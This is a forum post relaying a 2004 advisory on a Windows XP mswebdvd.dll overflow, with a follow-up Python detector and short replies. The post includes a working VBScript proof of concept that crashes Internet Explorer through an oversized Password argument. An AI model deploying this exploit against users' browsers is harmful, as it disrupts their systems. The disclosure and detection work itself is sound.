[AVISO] Windows XP 'mswebdvd.dll' Vulnerable

07/04/2004 - 14:25 by Ille Corvus
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service

DATE: Apr 6 2004

IMPACT: Denial of service via network

EXPLOIT INCLUDED: YES

VERSION(s): XP SP1, SP2

DESCRIPTION: Rafel Ivgi (The-Insider) reported a vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user can cause denial
of service conditions.

It is reported that a remote user can create HTML that loads the
'MSWebDVD.MSWebDVD.1' active scripting object with specially crafted
parameters for the AcceptParentalLevelChange() function to cause the
target user's Internet Explorer browser to crash. According to the
report, setting the 'Password' parameter to a value longer than 255
characters triggers the flaw.

Some demonstration exploit HTML is provided in the Source Message.
Impact: A remote user can create HTML that, when loaded by the target
user, will cause the target user's Internet Explorer browser to crash.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/technet/security/

Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Message History: None.

Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors: http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==1) Introduction==
"mswebdvd.dll" is a module that allows watching DVD films from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==2) Bug==
The "mswebdvd.dll" module was not correctly designed and does not check the
parameters that are sent to the "AcceptParentalLevelChange"
function. Therefore it is possible to D.O.S/CRASH Internet Explorer
remotely.

The function:
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean value), UserName as string, Password as string

Setting the "Password" value to a string longer than 255 chars will
cause the overflow.

Unfortunately this vulnerability affects all WindowsXP versions after
all patches and after SP1+SP2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=3) The Code=
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
Dim mymy2, a

' Build the oversized Password string. The mailer wrapped the original
' literals; each wrapped piece is kept as its own literal joined with &
' and the VBScript "_" continuation so the script parses as written.
a = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
    "AAAAAAA"
a = a & "ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" & _
    "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" & _
    "BBBBB"
a = a & "BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" & _
    "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" & _
    "CCCCC"
a = a & "CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" & _
    "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" & _
    "DDDDD"
a = a & "DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" & _
    "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" & _
    "EEEEE"
a = a & "EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" & _
    "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" & _
    "FFFFF"
a = a & "FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" & _
    "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" & _
    "GGGGG"
a = a & "GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" & _
    "HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" & _
    "HHHHH"
a = a & "HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII" & _
    "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII" & _
    "IIIII"
a = a & "IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ" & _
    "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ" & _
    "JJJJJ"
a = a & "JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK" & _
    "KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK" & _
    "KKKKK"
a = a & "KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL" & _
    "LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL" & _
    "LLLLL"
a = a & "LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM" & _
    "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM" & _
    "MMMMM"
a = a & "M1234567899876543211112222333344445555666677778888999998761234rafiisthekingofthebufferoverflows" & _
    "oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"

' Instantiate the MSWebDVD control and pass the oversized Password argument
Set mymy2 = CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a
</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible, Can do the Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Source: http://www.securitytracker.com/aler...09673.html



Windows XP SP1 and SP2 have this vulnerability; for the moment there is no
fix available.



Ille Corvus. In Aeternum.
Deserving of filtering (Kill-file):
tella llop, jm (N.B. 2003.10.25)
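The advisory quoted above names a single boundary: a Password argument to AcceptParentalLevelChange longer than 255 characters. The following Python check is an added example, not part of the post or of the advisory; it shows how a content filter or an analyst could flag HTML/VBScript that creates an "MSWebDVD.MSWebDVD.1" object and calls that method with a third argument that resolves to more than 255 characters, following only string literals, `&` concatenation, and `_` line continuations. Both sample scripts in the block are constructed for the example.

```python
"""Static check for HTML/VBScript that calls MSWebDVD's
AcceptParentalLevelChange with a Password argument beyond the 255-character
boundary named in the advisory. The sample scripts below are constructed."""
import re

PROGID = "MSWebDVD.MSWebDVD.1"
METHOD = "AcceptParentalLevelChange"
PASSWORD_LIMIT = 255  # boundary stated in the advisory


def _split_outside_quotes(text, sep):
    """Split text on sep, ignoring separators inside "..." literals."""
    parts, buf, in_str = [], [], False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts]


def _expr_length(expr, lengths):
    """Length of a VBScript string expression made of literals and already
    resolved variables joined with &; None if any part is unknown."""
    total = 0
    for part in _split_outside_quotes(expr, "&"):
        if len(part) >= 2 and part[0] == '"' and part[-1] == '"':
            total += len(part[1:-1].replace('""', '"'))
        elif part.lower() in lengths:
            total += lengths[part.lower()]
        else:
            return None
    return total


def _logical_lines(script):
    """Join VBScript '_' continuations and drop comment-only lines."""
    out, pending = [], ""
    for raw in script.splitlines():
        line = raw.strip()
        if line.startswith("'"):
            continue
        if line.endswith("_"):
            pending += line[:-1]
            continue
        out.append(pending + line)
        pending = ""
    return out


def find_oversized_password_calls(script):
    """Return (object_variable, resolved_length) for each METHOD call on an
    MSWebDVD object whose third (Password) argument exceeds PASSWORD_LIMIT."""
    lengths, dvd_objects, findings = {}, set(), []
    assign = re.compile(r"^(?:set\s+)?(\w+)\s*=\s*(.+)$", re.I)
    create = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.I)
    call = re.compile(r"^(?:call\s+)?(\w+)\." + METHOD + r"\s*\(?(.*?)\)?$", re.I)
    for line in _logical_lines(script):
        m = assign.match(line)
        if m:
            var, expr = m.group(1).lower(), m.group(2)
            c = create.search(expr)
            if c:
                if c.group(1).lower() == PROGID.lower():
                    dvd_objects.add(var)
                continue
            n = _expr_length(expr, lengths)
            if n is not None:
                lengths[var] = n  # track string variables built by concatenation
            continue
        m = call.match(line)
        if m and m.group(1).lower() in dvd_objects:
            args = _split_outside_quotes(m.group(2), ",")
            if len(args) >= 3:
                n = _expr_length(args[2], lengths)
                if n is not None and n > PASSWORD_LIMIT:
                    findings.append((m.group(1), n))
    return findings


# Constructed sample in the shape of the advisory's PoC: 200 + 100 + 50 = 350
SAMPLE_POC = (
    "<script language=vbscript>\n'On Error Resume Next\ndim mymy2,a\n"
    'a = "' + "A" * 200 + '" & _\n    "' + "B" * 100 + '"\n'
    'a = a & "' + "C" * 50 + '"\n'
    'Set mymy2 = CreateObject("MSWebDVD.MSWebDVD.1")\n'
    'mymy2.AcceptParentalLevelChange False, "xc", a\n</script>\n'
)
# Constructed benign use: same object and method, short Password
SAMPLE_BENIGN = (
    'Set dvd = CreateObject("MSWebDVD.MSWebDVD.1")\n'
    'dvd.AcceptParentalLevelChange True, "viewer", "short-password"\n'
)

if __name__ == "__main__":
    print(find_oversized_password_calls(SAMPLE_POC))     # [('mymy2', 350)]
    print(find_oversized_password_calls(SAMPLE_BENIGN))  # []
```

Strings assembled from sources the checker cannot resolve (function calls, `String(n, c)`, user input) yield None and are not flagged, so treat a clean result as "nothing provable", not as "safe".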


#1 scchummi
07/04/2004 - 14:45
Ille Corvus wrote:
> [the original post, quoted in full]

Thanks. Let's see how long they take to fix it.

This is an automatic signature of MesNews.
Site : http://mesnews.no-ip.com
#2 Anonimo
09/04/2004 - 07:18
> [the original post, quoted in full; no further text]

#3 Anonimo
09/04/2004 - 07:20
> [the original post, quoted in full; no further text]